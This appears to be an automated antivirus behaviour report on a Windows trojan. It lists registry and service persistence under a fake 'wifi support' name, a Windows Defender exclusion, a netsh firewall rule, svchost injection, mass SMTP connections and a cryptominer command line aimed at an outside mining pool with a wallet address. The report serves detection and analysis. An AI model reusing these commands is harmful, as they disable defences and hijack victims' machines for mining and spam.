Technical Information
To ensure autorun and distribution
Sets the following service settings
- [<HKLM>\System\CurrentControlSet\Services\yhqburkp] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\yhqburkp] 'ImagePath' = '<SYSTEM32>\yhqburkp\jhrppfoe.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\yhqburkp] 'ImagePath' = '<SYSTEM32>\yhqburkp\jhrppfoe.exe'
Creates the following services
- 'yhqburkp' <SYSTEM32>\yhqburkp\jhrppfoe.exe /d"<Full path to file>"
- 'yhqburkp' <SYSTEM32>\yhqburkp\jhrppfoe.exe
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion with following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>\yhqburkp' = '00000000'
Executes the following
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="<SYSTEM32>\svchost.exe" enable=yes>nul
Injects code into
the following system processes:
- <SYSTEM32>\svchost.exe
Modifies file system
Creates the following files
- %TEMP%\jhrppfoe.exe
- <SYSTEM32>\config\systemprofile:.repos
Moves the following files
- from %TEMP%\jhrppfoe.exe to <SYSTEM32>\yhqburkp\jhrppfoe.exe
Deletes itself.
Network activity
Connects to
- 'de###twax.ru':443
- 'in#####e.bizmeka.com':25
- 'd1######.#ss.barracudanetworks.com':25
- 'ma##.##sic-emotion.nl':25
- 'ct################i.mail.protection.outlook.com.ctp-consulting.com':25
- 'mx#.##urecia.com':25
- 'ma##.#aarbeek.nl':25
- 'ma##.#opycompany.nl':25
- 'ko#####.univ-paris7.fr':25
- 'co###########ine-nl.mail.protection.outlook.com':25
- 'ma##.andmore.nl':25
- 'ma##.wido.info':25
- 'mx#.###ay.renater.fr':25
- 'ma###.bravehost.com':25
- 'mx.#len.pl':25
- 'mx##.#aramail.com':25
- 'mx##.mb5p.com':25
- 'cu#######-3.in.mailcontrol.com':25
- 'mx.#oih.com':25
- 'ko##ct.us':25
- 'pu######1.mail2world.com':25
- 'ma###in.box.nl':25
- 'ma###.#ailinator.com':25
- 'mx##.cbsolt.net':25
- 'mx#.qq.com':25
- 'mx.###zta.onet.pl':25
- 'pa####x.above.com':25
- 'r-####6.korea.com':25
- 'mx##.schlund.de':25
- 'fm#.#reemail.hu':25
- 'ma###.##m.1.0001.arsmtp.com':25
- 'mx####.marsh.com':25
- 'mx#.#ate.com':25
- 'ma##.###ercarecorpgroup.com':25
- 'em##.freenet.de':25
- 'mx#.##il.ovh.net':25
- 'mx#######901.gslb.pphosted.com':25
- 'd6#####.##s.barracudanetworks.com':25
- 'ma####ion.nerim.net':25
- 'ma##.ccp.com':25
- 'aa.####-investment.ru':25
- 'mx.##teria.pl':25
- 'ro####-guides.com':25
- 'mx#.weg.net':25
- 'mx.#####.#e.cust.b.hostedemail.com':25
- 'ma##.#imchang.com':25
- 'mx#.####497.c3s2.iphmx.com':25
- 'mx#######f02.gslb.pphosted.com':25
- 'se#####06.citromail.hu':25
- 'mx#.free.fr':25
- 'mx#######701.gslb.pphosted.com':25
- 'mx#######501.gslb.pphosted.com':25
- 'ma##.##bblicarrello.com':25
- 'ma##.#nc-filter.com':25
- 'mx#.####external.iphmx.com':25
- 'd2#####.#.#ss.uk.barracudanetworks.com':25
- 'mx##.mail.com':25
- 'ma##.#dr-summit.com':25
- 'mx#######b02.gslb.pphosted.com':25
- 'mx#######801.gslb.pphosted.com':25
- 'mx##.##il.icloud.com':25
- 'ma####.#uchananinbox.com':25
- 'mt##.##0.yahoodns.net':25
- 'aspmx.l.google.com':25
- 'mx.###eric-isp.com':25
- 'mx#.#eznam.cz':25
- 'mx#.#omcast.net':25
- 'ma##.#ivendi.net':25
- 'cu####.cscdns.net':25
- 'mx.##wered.name':25
- 'ma##.#egister.it':25
- 'al######x-vip1.prodigy.net':25
- 'ed#######.constantcontact.com':25
- 'fa###ool.xyz':10060
- 'mx####.##il.gm0.yahoodns.net':25
- 'd7#####.##s.barracudanetworks.com':25
- 'cx#.##.#.cloudfilter.net':25
- 'mx#.##lemach.net':25
- 'de###twax.ru':480
- 'mi##########m.mail.protection.outlook.com':25
- 'ma##.#-email.net':25
- 'ma##.##ubleupmobile.com':25
- 'mx#.ovh.net':25
- 'mx####.carrierzone.com':25
- '19######0.pamx1.hotmail.com':25
- '19#.#6.146.43':416
- 'mx.##nmail.nl':25
- 'mx######91d01.pphosted.com':25
- 'ed###d.cps.com':25
- 'mx.#####.#om.cust.b.hostedemail.com':25
- 'ma####01.komodo.ch':25
- 'sm###in.sfr.fr':25
- 'google.com':80
- '91.##9.63.95':416
- '51.##8.144.223':416
- '18#.#53.219.200':416
- '19#.#6.146.41':416
- '19#.#6.146.42':416
- 'mx.#########ine.net.cust.b.hostedemail.com':25
- 'ma####.simatec.com':25
- 'mx#######201.gslb.pphosted.com':25
- 'mx#######d02.gslb.pphosted.com':25
- 'mx.##.#tinternet.com':25
- 'as##.##ilinblack.com':25
- 'mx###.mb5p.com':25
- 're####.#extgen.topsec.com':25
- 'b1.##ista.fr':25
- 'mx####.oricom.ca':25
- 'mx##.mb1p.com':25
- 'ma##.##ess-herald.com':25
- 'ex####l.bigpond.com':25
- 'xn##e.us':25
TCP
HTTP GET requests
- http://www.google.com/
Other
- 'de###twax.ru':443
- 'pa####x.above.com':25
- 'ma###.#ailinator.com':25
- 'ma###in.box.nl':25
- 'pu######1.mail2world.com':25
- 'mx.#oih.com':25
- 'ma##.##ess-herald.com':25
- 'ko##ct.us':25
- 'mx.###zta.onet.pl':25
- 'ma##.wido.info':25
- 'ma##.andmore.nl':25
- 'ko#####.univ-paris7.fr':25
- 'co###########ine-nl.mail.protection.outlook.com':25
- 'alt2.aspmx.l.google.com':25
- 'mx####.carrierzone.com':25
- 'ma##.#aarbeek.nl':25
- 'ma###.bravehost.com':25
- 'ma##.##sic-emotion.nl':25
- 'in#####e.bizmeka.com':25
- 'mx.##teria.pl':25
- 'aa.####-investment.ru':25
- 'ma##.##ubleupmobile.com':25
- 'mx#.####497.c3s2.iphmx.com':25
- 'ma##.#imchang.com':25
- 'ma##.##bblicarrello.com':25
- 'mx#.weg.net':25
- 'ma####ion.nerim.net':25
- 'ma##.###ercarecorpgroup.com':25
- 'mx#.##il.ovh.net':25
- 'mx#.qq.com':25
- 'mx##.cbsolt.net':25
- 'd2#####.#.#ss.uk.barracudanetworks.com':25
- '19######0.pamx1.hotmail.com':25
- 'ed###d.cps.com':25
- 'mx#.##lemach.net':25
- 'fa###ool.xyz':10060
- 'mx####.##il.gm0.yahoodns.net':25
- 'ed#######.constantcontact.com':25
- 'al######x-vip1.prodigy.net':25
- 'd7#####.##s.barracudanetworks.com':25
- 'ma##.#-email.net':25
- 'aspmx.l.google.com':25
- 'mt##.##0.yahoodns.net':25
- 'mx#.#eznam.cz':25
- 'ma####.#uchananinbox.com':25
- 'mx.###eric-isp.com':25
- 'cu####.cscdns.net':25
- 'ma###.##m.1.0001.arsmtp.com':25
- 'ma##.#opycompany.nl':25
- 'ma##.#dr-summit.com':25
- 'b1.##ista.fr':25
- 're####.#extgen.topsec.com':25
- 'mx##.mb1p.com':25
- 'as##.##ilinblack.com':25
- '51.##8.144.223':416
- '18#.#53.219.200':416
- '91.##9.63.95':416
- 'mx.##.#tinternet.com':25
- 'mx#.ovh.net':25
- 'ma####01.komodo.ch':25
- '19#.#6.146.42':416
- '19#.#6.146.43':416
- '19#.#6.146.41':416
- 'de###twax.ru':480
- 'mx####.oricom.ca':25
- 'xn##e.us':25
UDP
- DNS ASK de###twax.ru
- DNS ASK ii##e.com
- DNS ASK alt2.aspmx.l.google.com
- DNS ASK co###ompany.nl
- DNS ASK ma##.#opycompany.nl
- DNS ASK et#.#nistra.fr
- DNS ASK la##beek.nl
- DNS ASK ma##.#aarbeek.nl
- DNS ASK fa###cia.com
- DNS ASK mx#.##urecia.com
- DNS ASK ce##tel.net
- DNS ASK cl#b.fr
- DNS ASK ct####nsulting.com
- DNS ASK ct################i.mail.protection.outlook.com.ctp-consulting.com
- DNS ASK mu####emotion.nl
- DNS ASK ma##.##sic-emotion.nl
- DNS ASK ba##ns.com
- DNS ASK d1######.#ss.barracudanetworks.com
- DNS ASK in###bee.com
- DNS ASK in#####e.bizmeka.com
- DNS ASK se###topol.in
- DNS ASK ko##a.com
- DNS ASK r-####6.korea.com
- DNS ASK se##am.cz
- DNS ASK in##ria.pl
- DNS ASK mx.##teria.pl
- DNS ASK ko#####.univ-paris7.fr
- DNS ASK ma###.#ailinator.com
- DNS ASK pa####.jussieu.fr
- DNS ASK co####usmagazine.nl
- DNS ASK ma###in.box.nl
- DNS ASK ma###robin.com
- DNS ASK pu######1.mail2world.com
- DNS ASK sp#.us
- DNS ASK mx.#oih.com
- DNS ASK cf###ails.com
- DNS ASK ko##ct.us
- DNS ASK fr##cetv.fr
- DNS ASK cu#######-3.in.mailcontrol.com
- DNS ASK or##de.fr
- DNS ASK mx##.mb5p.com
- DNS ASK ca###ail.com
- DNS ASK mx##.#aramail.com
- DNS ASK o2.pl
- DNS ASK mx.#len.pl
- DNS ASK op.pl
- DNS ASK mx.###zta.onet.pl
- DNS ASK te###otrix.com
- DNS ASK ma###.bravehost.com
- DNS ASK et#.##iv-savoie.fr
- DNS ASK di##nus.nl
- DNS ASK ma##.wido.info
- DNS ASK ac###enoble.fr
- DNS ASK an##ore.nl
- DNS ASK ma##.andmore.nl
- DNS ASK co###########ine-nl.mail.protection.outlook.com
- DNS ASK bo#.nl
- DNS ASK ma##000.com
- DNS ASK ra###france.com
- DNS ASK ne##m.net
- DNS ASK ma####ion.nerim.net
- DNS ASK my###ropcs.com
- DNS ASK d6#####.##s.barracudanetworks.com
- DNS ASK nc##.com
- DNS ASK mx#######901.gslb.pphosted.com
- DNS ASK cp####itions.com
- DNS ASK mx#.##il.ovh.net
- DNS ASK ou##ook.com
- DNS ASK fo###the.com
- DNS ASK in#####recorpgroup.com
- DNS ASK mx###.mb5p.com
- DNS ASK ma##.###ercarecorpgroup.com
- DNS ASK em##.freenet.de
- DNS ASK na##.com
- DNS ASK mx#.#ate.com
- DNS ASK gu##arp.com
- DNS ASK mx####.marsh.com
- DNS ASK ma##i.com
- DNS ASK ma###.##m.1.0001.arsmtp.com
- DNS ASK fr##mail.hu
- DNS ASK fm#.#reemail.hu
- DNS ASK bi##ond.com
- DNS ASK ex####l.bigpond.com
- DNS ASK cc#.com
- DNS ASK ma##.ccp.com
- DNS ASK gm##.com
- DNS ASK aa.####-investment.ru
- DNS ASK mx##.schlund.de
- DNS ASK mx#######501.gslb.pphosted.com
- DNS ASK pu####carrello.com
- DNS ASK ma##.##bblicarrello.com
- DNS ASK kc#.com
- DNS ASK mx#######701.gslb.pphosted.com
- DNS ASK nu###icable.fr
- DNS ASK ki###ang.com
- DNS ASK ma##.#imchang.com
- DNS ASK em##l.com
- DNS ASK on##ne.fr
- DNS ASK mx#.free.fr
- DNS ASK ci###mail.hu
- DNS ASK se#####06.citromail.hu
- DNS ASK pf##er.com
- DNS ASK mx#######f02.gslb.pphosted.com
- DNS ASK wa##a.com
- DNS ASK mx#.####497.c3s2.iphmx.com
- DNS ASK ly##s.de
- DNS ASK mx.#####.#e.cust.b.hostedemail.com
- DNS ASK we#.net
- DNS ASK mx#.weg.net
- DNS ASK ro####-guides.com
- DNS ASK kl###web.com
- DNS ASK kn###ilter.com
- DNS ASK un##-lr.fr
- DNS ASK ma##.#nc-filter.com
- DNS ASK ma###nator.com
- DNS ASK pr####tionen.net
- DNS ASK it###nket.net
- DNS ASK mx#.#omcast.net
- DNS ASK em##l.cz
- DNS ASK mx#.#eznam.cz
- DNS ASK va###offer.info
- DNS ASK mx.###eric-isp.com
- DNS ASK google.com
- DNS ASK aspmx.l.google.com
- DNS ASK ro###tmail.com
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK bu####aninbox.com
- DNS ASK ma####.#uchananinbox.com
- DNS ASK ic##ud.com
- DNS ASK mx##.##il.icloud.com
- DNS ASK ne###ape.net
- DNS ASK sp###rum.com
- DNS ASK mx#######801.gslb.pphosted.com
- DNS ASK pp#.com
- DNS ASK mx#######b02.gslb.pphosted.com
- DNS ASK cd###ummit.com
- DNS ASK ma##.#dr-summit.com
- DNS ASK ra###chot.com
- DNS ASK mx#.ovh.net
- DNS ASK ho###ail.com
- DNS ASK mx##.mb1p.com
- DNS ASK co##ast.net
- DNS ASK vi##ndi.com
- DNS ASK st###ardlife.ca
- DNS ASK ho##ial.com
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK te###ach.net
- DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
- DNS ASK mx#.##lemach.net
- DNS ASK co#.net
- DNS ASK cx#.##.#.cloudfilter.net
- DNS ASK 19#.###.#11.95.bl.spamcop.net
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK tm##ail.net
- DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
- DNS ASK d7#####.##s.barracudanetworks.com
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK cs.com
- DNS ASK fa###ool.xyz
- DNS ASK mx####.##il.gm0.yahoodns.net
- DNS ASK co####ntcontact.com
- DNS ASK ed#######.constantcontact.com
- DNS ASK sb###obal.net
- DNS ASK al######x-vip1.prodigy.net
- DNS ASK po##ido.biz
- DNS ASK ma##.#egister.it
- DNS ASK wm###nect.com
- DNS ASK da##emi.com
- DNS ASK mx.##wered.name
- DNS ASK ma##.#-email.net
- DNS ASK ma##.#ivendi.net
- DNS ASK cu####.cscdns.net
- DNS ASK do####upmobile.com
- DNS ASK mx.#####.#om.cust.b.hostedemail.com
- DNS ASK ed###d.cps.com
- DNS ASK ne###ape.com
- DNS ASK be###outh.com
- DNS ASK mx######91d01.pphosted.com
- DNS ASK kp##ail.nl
- DNS ASK mx.##nmail.nl
- DNS ASK db##il.com
- DNS ASK 19######0.pamx1.hotmail.com
- DNS ASK ea###ling.net
- DNS ASK mx##.mail.com
- DNS ASK ch####mhouse.org
- DNS ASK d2#####.#.#ss.uk.barracudanetworks.com
- DNS ASK ab##tt.com
- DNS ASK sa##.com
- DNS ASK mx#.####external.iphmx.com
- DNS ASK fo##ail.com
- DNS ASK mx#.qq.com
- DNS ASK un##tra.fr
- DNS ASK mx#.###ay.renater.fr
- DNS ASK pr#####osteadycam.it
- DNS ASK mx##.cbsolt.net
- DNS ASK mi##tel.net
- DNS ASK pa####x.above.com
- DNS ASK ly##s.com
- DNS ASK fe#.org
- DNS ASK cp#.com
- DNS ASK ma####01.komodo.ch
- DNS ASK sm###in.sfr.fr
- DNS ASK ma##.##ubleupmobile.com
- DNS ASK mx####.carrierzone.com
- DNS ASK su####-maine.net
- DNS ASK mx.#########ine.net.cust.b.hostedemail.com
- DNS ASK pr####herald.com
- DNS ASK ma##.##ess-herald.com
- DNS ASK qi#.com
- DNS ASK mx####.oricom.ca
- DNS ASK ep##al.fr
- DNS ASK b1.##ista.fr
- DNS ASK to##ail.com
- DNS ASK re####.#extgen.topsec.com
- DNS ASK xy###ail.com
- DNS ASK fr##net.de
- DNS ASK dr###orx.com
- DNS ASK as##.##ilinblack.com
- DNS ASK ta##21.com
- DNS ASK mx.##.#tinternet.com
- DNS ASK du#####lastomers.com
- DNS ASK mx#######d02.gslb.pphosted.com
- DNS ASK ve##zon.net
- DNS ASK wa##art.com
- DNS ASK mx#######201.gslb.pphosted.com
- DNS ASK si##tec.com
- DNS ASK ma####.simatec.com
- DNS ASK no#s.fr
- DNS ASK su###est.net
- DNS ASK od####e-droit.fr
- DNS ASK xn##e.us
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\yhqburkp\jhrppfoe.exe' /d"<Full path to file>"
- '<SYSTEM32>\cmd.exe' /C mkdir <SYSTEM32>\yhqburkp\' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C move /Y "%TEMP%\jhrppfoe.exe" <SYSTEM32>\yhqburkp\' (with hidden window)
- '<SYSTEM32>\sc.exe' create yhqburkp binPath= "<SYSTEM32>\yhqburkp\jhrppfoe.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '<SYSTEM32>\sc.exe' description yhqburkp "wifi internet conection"' (with hidden window)
- '<SYSTEM32>\sc.exe' start yhqburkp' (with hidden window)
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="<SYSTEM32>\svchost.exe" enable=yes>nul' (with hidden window)
Executes the following
- '<SYSTEM32>\cmd.exe' /C mkdir <SYSTEM32>\yhqburkp\
- '<SYSTEM32>\cmd.exe' /C move /Y "%TEMP%\jhrppfoe.exe" <SYSTEM32>\yhqburkp\
- '<SYSTEM32>\sc.exe' create yhqburkp binPath= "<SYSTEM32>\yhqburkp\jhrppfoe.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '<SYSTEM32>\sc.exe' description yhqburkp "wifi internet conection"
- '<SYSTEM32>\sc.exe' start yhqburkp
- '<SYSTEM32>\svchost.exe'
- '<SYSTEM32>\svchost.exe' -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
